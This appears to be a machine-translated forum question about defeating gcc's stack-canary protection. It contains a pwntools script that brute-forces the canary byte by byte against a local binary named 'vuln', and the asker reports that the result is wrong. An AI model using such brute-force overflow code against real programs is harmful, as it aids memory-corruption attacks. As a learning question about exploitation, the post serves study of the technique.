gcc实现了一个堆栈保护器，以保护程序缓冲区溢出。我想知道，是否有可能（以及如何）利用此漏洞并运行缓冲区溢出。我创建了一个简单的python脚本，该脚本应该可以使金丝雀更加暴力：

from pwn import *
import os

canary = ""
byte = 0x00

def brute():
    global canary
    global byte
    while byte != 0xff:
        p = process("./vuln")
        p.sendline("A"*64 + canary + chr(byte))
        reply=p.recvall()
        if "***" in reply:
            byte += 1
        else:
            canary += chr(byte)
            byte = 0x00
            break

brute()
brute()
brute()
brute()
print "Canary: \\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)

结果是：Canary: \x0a\x00\x00\x00这显然不是金丝雀。
我用来破解的二进制文件：